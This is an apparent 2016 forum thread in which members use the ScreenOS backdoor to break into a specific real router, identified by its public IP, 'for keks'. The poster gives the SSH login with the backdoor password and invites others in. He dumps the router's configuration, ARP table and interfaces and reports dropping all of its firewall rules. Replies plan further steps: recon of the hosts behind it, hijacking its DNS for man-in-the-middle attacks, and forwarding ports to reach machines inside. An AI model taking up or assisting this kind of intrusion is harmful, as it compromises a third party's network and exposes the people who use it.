User Controls
Ok guise lets commandeer this network for keks.
-
2016-01-26 at 12:15 PM UTCYou may recall my thread on ScreenOS router backdoors. http://niggasin.space/forum/technoph...list-by-sophie If you haven't read it already, you should it's an interesting thread. Anyway i SSH'd into a backdoored router to see if i could do anything interesting, i'm root so i can basically do anything i want. First i dropped all screens(firewall rules) then i was able to portscan the IP in question. Here's the results.
Starting Nmap 6.47
Nmap scan report for rrcs-24-213-214-22.nys.biz.rr.com (24.213.214.22)
Host is up (0.023s latency).
Not shown: 808 enhancemented ports, 189 closed ports
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
8181/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 14.74 seconds
The http-proxy service redirects from 24.213.214.22:8080 to 24.213.214.22:8181 which is a login screen, https://24.213.214.22:8181/index.html probably for remote access to the router via HTTPS. Querying the administrative configuration seems to corroborate this.
HTTP Port: 8080, HTTPS Port: 8181
TELNET Port: 23, SSH Port: 22
Manager IP enforced: False
Manager IPs: 0
Address Mask Vsys
---------------------------------------- ---------------------------------------- --------------------
Mail Alert: Off, Mail Server:
E-Mail Address:
E-Mail Traffic Log: Off
Configuration Format: DOS
Device Reset: Enabled
Hardware Reset: Enabled
Admin privilege: read-only (Remote admin has read-only privileges)
Max Failed Admin login attempts: 3
Lock admin accounts on auth failure: On, locking time 3 minutes
HTTP redirect: true
Also note how admin privilege says we should have "read only" privilege, well that would be true if we logged in with a regular admin account but the nature of the backdoor is that you login as sys/root. There's also a number of devices connected to the router as the arp table shows:
usage: 6/1024 miss: 0
always-on-dest: disabled
-----------------------------------------------------------------------------------------
IP Mac VR/Interface State Age Retry PakQue Sess_cnt
-----------------------------------------------------------------------------------------
192.168.55.255 ffffffffffff trust-vr/bgroup0 STS 0 0 1
192.168.55.200 0000aafb5ea6 trust-vr/bgroup0 VLD 693 0 0 0
24.213.214.21 0000ca000003 trust-vr/eth0/0 VLD 666 0 0 9
192.168.55.105 7427eaf334d5 trust-vr/bgroup0 VLD 1180 0 0 2
192.168.55.114 08000f678d32 trust-vr/bgroup0 VLD 494 0 0 2
192.168.55.115 08000f678f4e trust-vr/bgroup0 VLD 313 0 0 2
Now i was wondering, since we own the router and firewall what would be the next logical step in securing the rest of the network? Feel free to SSH into the thing and come have a look.
ssh -l administrator 24.213.214.22
Password: <<< %s(un='%s') = %u
Here's a list of basic commands.
http://www.skullbox.net/screenos-cheat-sheet.php
Here are some more obscure commands including those for displaying all commands available.
http://www.cymru.com/gillsr/document...n-commands.htm -
2016-01-26 at 1:58 PM UTCinb4 honeypot
Nice job, SWIY.
A word of caution though:
SSH may also log your public key fingerprints fingerprints even if you're using a password (I think it first tries pubkey auth, then password auth), so it might be wise to make sure you're not offering your pubkey fingerprint.
As far as what to do next:
You have access to the router. That's pretty fucking awesome. It's easier to explore the network if you're sitting on the router. You've got the arp table, routing table, dhcp entires. I've only worked with Cisco hardware, but I assume Juniper stuff has to include the same functionality, so you should be able to check out these files. One thing that comes to mind is to link entries from the arp table with the dhcp table and then find out the mfg of connected devices from their mac addresses. If you can access the NAT table, you can also deduce what services are connecting outside of the router (if NAT is even used) and get an idea of what kinda traffic is going in and out. This is all completely passive - you're not interacting with the network in any way so you shouldnt set off any IDS or anything.
As far as active recon, I don't have any ideas right now.
-
2016-01-27 at 3:01 PM UTC"Now i was wondering, since we own the router and firewall what would be the next logical step in securing the rest of the network? "
Get us some more info on the clients, see whats diddling around, what services, oses they like etc
gj
https://www.youtube.com/watch?v=cIzM9p3dUm8 -
2016-01-27 at 6:56 PM UTC
inb4 honeypot
Nice job, SWIY.
A word of caution though:
SSH may also log your public key fingerprints fingerprints even if you're using a password (I think it first tries pubkey auth, then password auth), so it might be wise to make sure you're not offering your pubkey fingerprint.
As far as what to do next:
You have access to the router. That's pretty fucking awesome. It's easier to explore the network if you're sitting on the router. You've got the arp table, routing table, dhcp entires. I've only worked with Cisco hardware, but I assume Juniper stuff has to include the same functionality, so you should be able to check out these files. One thing that comes to mind is to link entries from the arp table with the dhcp table and then find out the mfg of connected devices from their mac addresses. If you can access the NAT table, you can also deduce what services are connecting outside of the router (if NAT is even used) and get an idea of what kinda traffic is going in and out. This is all completely passive - you're not interacting with the network in any way so you shouldnt set off any IDS or anything.
As far as active recon, I don't have any ideas right now.
"get nat"
Didn't give me anything. "get dhcp" told me DHCP server is enableb but:
bgroup0: DHCP server is enabled
Total 0 MACs are queued by DHCP relay.
Truth be told i'm not much of a network engineer, furthermore, ScreenOS has other 'command' conventions that what i'm used to. Also:Get us some more info on the clients, see whats diddling around, what services, oses they like etc
I would but first i'll be looking into some ScrenOS commands some more to actually get the thing to do what i want it to do. Any tips would be welcomed. -
2016-01-28 at 2:12 PM UTCHm, I'll try to look into it soon. There's gotta be some way to read the tables :/ I mean cisco IOS has all these tools to manually edit this info, so I cant believe juniper os doesnt have the same capabilities... but maybe it is. I've got like 1h of internet time a day, I'll try to get back to you.
Did you make any progress? -
2016-01-28 at 4:55 PM UTC
Did you make any progress?
I had some IRL matter to take care of today, tonight when i have a moment i'll play around with it some more.
-
2016-01-28 at 10:32 PM UTCIs there any valuable data within this network, or is it just a network to play with?
-
2016-01-28 at 11:12 PM UTC"get tcp" showed me this
tcp checksum error: 11, tcp http ping: 0
tcp user auth: 0, tcp unknown port 0
tcp no more socket: 0, tcp syn pak error: 7522
tcp socket full drop count: 331
tcp ooo segs: 0, tcp ooo segs drop count: 0
max ooo segs: 32, default max ooo segs 32
Total sock: 5/64, debug remote port: 65535
1: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/8181, ::/0, window: 0/0/0
2: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/23, ::/0, window: 0/0/0
3: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/22, ::/0, window: 0/0/0
47: inuse: 1, mode: 2, state: 4, ifnum: 0, idle: 0, timer 1(0/10)
24.213.214.22/22, 95.141.29.38/2593, window: -172350114/-1651650253/16384
50: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/8080, ::/0, window: 0/0/0
"get interface" showed me this.
A - Active, I - Inactive, U - Up, D - Down, R - Ready
Interfaces in vsys Root:
Name IP Address Zone MAC VLAN State VSD
serial0/0 0.0.0.0/0 Null N/A - D -
eth0/0 24.213.214.22/30 Untrust 3c8a.b0af.2d80 - U -
eth0/1 0.0.0.0/0 Null 3c8a.b0af.2d85 - D -
eth0/3 0.0.0.0/0 Null 3c8a.b0af.2d87 - D -
eth0/4 0.0.0.0/0 Null 3c8a.b0af.2d88 - D -
eth0/5 0.0.0.0/0 Null 3c8a.b0af.2d89 - D -
eth0/6 0.0.0.0/0 Null 3c8a.b0af.2d8a - D -
bgroup0 192.168.55.1/24 Trust 3c8a.b0af.2d8b - U -
eth0/2 N/A N/A N/A - U -
bgroup1 0.0.0.0/0 Null 3c8a.b0af.2d8c - D -
bgroup2 0.0.0.0/0 Null 3c8a.b0af.2d8d - D -
bgroup3 0.0.0.0/0 Null 3c8a.b0af.2d8e - D -
tun.1 unnumbered Trust ethernet0/0 - U -
vlan1 0.0.0.0/0 VLAN 3c8a.b0af.2d8f 1 D -
null 0.0.0.0/0 Null N/A - U -
Dropped some system info. But guys jesus christ the documentation on ScreenOS including all commands is literally 900 pages long
PIN-ROCH-> get system
Product Name: SSG5-Serial
Serial Number: 0162112013000693, Control Number: 00000000
Hardware Version: 0710(0)-(00), FPGA checksum: 00000000, VLAN1 IP (0.0.0.0)
Flash Type: Samsung
Software Version: 6.3.0r17.0, Type: Firewall+VPN
Feature: AV-K
BOOT Loader Version: 1.3.2
Compiled by build_master at: Sun Apr 20 10:10:02 PDT 2014
Base Mac: 3c8a.b0af.2d80
File Name: screenos_image, Checksum: ca92f672
, Total Memory: 256MB
Date 01/28/2016 17:59:44, Daylight Saving Time enabled
The Network Time Protocol is Disabled
Up 1693 hours 48 minutes 40 seconds Since 19Nov2015:04:11:04
Total Device Resets: 0
System in NAT/route mode.
Use interface IP, Config Port: 8080
Manager IP enforced: False
Manager IPs: 0
Address Mask Vsys
---------------------------------------- ---------------------------------------- --------------------
User Name: netscreen
Interface serial0/0:
description serial0/0
number 21, if_info 1848, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d95
bandwidth: physical 92kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/0:
description ethernet0/0
number 0, if_info 0, if_index 0, mode route
link up, phy-link up/full-duplex, admin status up
status change:105, last change:01/27/2016 17:12:00
vsys Root, zone Untrust, vr trust-vr
dhcp client disabled
PPPoE disabled
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 24.213.214.22/30 mac 3c8a.b0af.2d80
gateway 24.213.214.21
*manage ip 24.213.214.22, mac 3c8a.b0af.2d80
route-deny disable
bandwidth: physical 100000kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/1:
description ethernet0/1
number 5, if_info 440, if_index 0
link down, phy-link down, admin status down
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d85
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/2:
description ethernet0/2
number 6, if_info 528, if_index 0
link up, phy-link up/full-duplex
status change:1, last change:11/19/2015 04:11:06
member of bgroup0
vsys Root, zone Null, vr untrust-vr
*ip 0.0.0.0/0 mac 3c8a.b0af.2d86
Interface ethernet0/3:
description ethernet0/3
number 7, if_info 616, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d87
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/4:
description ethernet0/4
number 8, if_info 704, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d88
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/5:
description ethernet0/5
number 9, if_info 792, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d89
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/6:
description ethernet0/6
number 10, if_info 880, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d8a
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface bgroup0:
description bgroup0
number 11, if_info 968, if_index 0, mode nat
link up, phy-link up/full-duplex, admin status up
status change:1, last change:11/19/2015 04:11:06
vsys Root, zone Trust, vr trust-vr
dhcp client disabled
PPPoE disabled
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 192.168.55.1/24 mac 3c8a.b0af.2d8b
*manage ip 192.168.55.1, mac 3c8a.b0af.2d8b
route-deny disable
bandwidth: physical 100000kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface bgroup1:
description bgroup1
number 12, if_info 1056, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d8c
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface bgroup2:
description bgroup2
number 13, if_info 1144, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d8d
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface bgroup3:
description bgroup3
number 14, if_info 1232, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d8e
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps -
2016-01-28 at 11:30 PM UTCMAybe i'll just let Nexpose scan the router with the credentials i provided to maybe that would make me any the wiser.
-
2016-01-28 at 11:37 PM UTC
Is there any valuable data within this network, or is it just a network to play with?
No clue, so far all i'll i've able to access is the router. -
2016-02-02 at 12:19 PM UTCGive me like 2 hours and I'll have every box on the network rooted
-
2016-02-02 at 3:47 PM UTC
Give me like 2 hours and I'll have every box on the network rooted
Teach me the ways of the force, master. -
2016-02-02 at 4:55 PM UTC
Teach me the ways of the force, master.
Sorry that I havent posted anything yet, I just got back from traveling and Im jet lagged back into 1999. -
2016-02-02 at 9:49 PM UTC
Sorry that I havent posted anything yet, I just got back from traveling and Im jet lagged back into 1999.
No need to apoligize, silly. -
2016-02-05 at 10:39 AM UTCInteresting make-believe scenario.
So there's not much going on in there it seems. No DHCP - maybe the hosts use static addressing? The arp'ed macs show that there's probably a few pc's and a printer on the network. You could try scanning those ip's for open ports.
Another thing that comes to mind is taking a snapshot of the current interface counters now and in like 24h to get an idea of how much data is moved through the network. Looking at the docs, youd do this by
get counter statistics interface ethernet0/0
get counter statistics interface ethernet0/6
I'm going by your latest info dump that specifies interfaces 0 and 6 as being up and all the others as being down.
You could also do
get dns host settings - Displays DNS servers and assigned interfaces
get admin - Displays management information such as access ports and enhancemented IP addresses
A DNS server/cache could be a trove of information or helpful in further steps in this game.
-
2016-02-05 at 1:19 PM UTCCurrently running a network audit with Nexpose with the credentials i provided, if nothing interesting comes up i'll run an asset discovery scan if that comes up with the local network i'll run a general audit on the devices on the network itself, obviously i'll post the results here. here's the info you requested.
get dns host settings
DNS Server:
Primary : 24.92.226.11, Src Interface: ethernet0/0
Secondary: 24.92.226.12, Src Interface: ethernet0/0
Tertiary : 0.0.0.0, Src Interface: Null
Refresh domain name IP Addresses:
Never
Normal UDP session: 0 -
2016-02-05 at 2:13 PM UTC
Currently running a network audit with Nexpose with the credentials i provided, if nothing interesting comes up i'll run an asset discovery scan if that comes up with the local network i'll run a general audit on the devices on the network itself, obviously i'll post the results here. here's the info you requested.
get dns host settings
DNS Server:
Primary : 24.92.226.11, Src Interface: ethernet0/0
Secondary: 24.92.226.12, Src Interface: ethernet0/0
Tertiary : 0.0.0.0, Src Interface: Null
Refresh domain name IP Addresses:
Never
Normal UDP session: 0
GJ dude. The dns stuff doesn't look interesting, it's just using some default TWC dns servers I think. It does offer some chance of a mitm if you set up your own dns server and changed those settings to point to your dns server. -
2016-02-05 at 3:46 PM UTC
GJ dude. The dns stuff doesn't look interesting, it's just using some default TWC dns servers I think. It does offer some chance of a mitm if you set up your own dns server and changed those settings to point to your dns server.
I'm trying to forward some ports, "set VIP multi-port" is the first command in a series you need to perform, but it told me the router had to be reset in order for the changes to take effect i thought about it but if there are people actively using the network and i reset the router remotely they might start to ask questions lel. Also, sadly, i don't have my own DNS server. Nexpose only got as far as the router it did find some vulnerabilities related to the web interface of the thing but nothing too interesting. Mostly certificate stuff.
Now i usually do web app so i have no idea how to get past the router into the network itself without forwarding ports or if that's even the best way for that matter. Here's the documentation i could find on port forwarding, http://kb.juniper.net/InfoCenter/ind...tent&id=KB4740
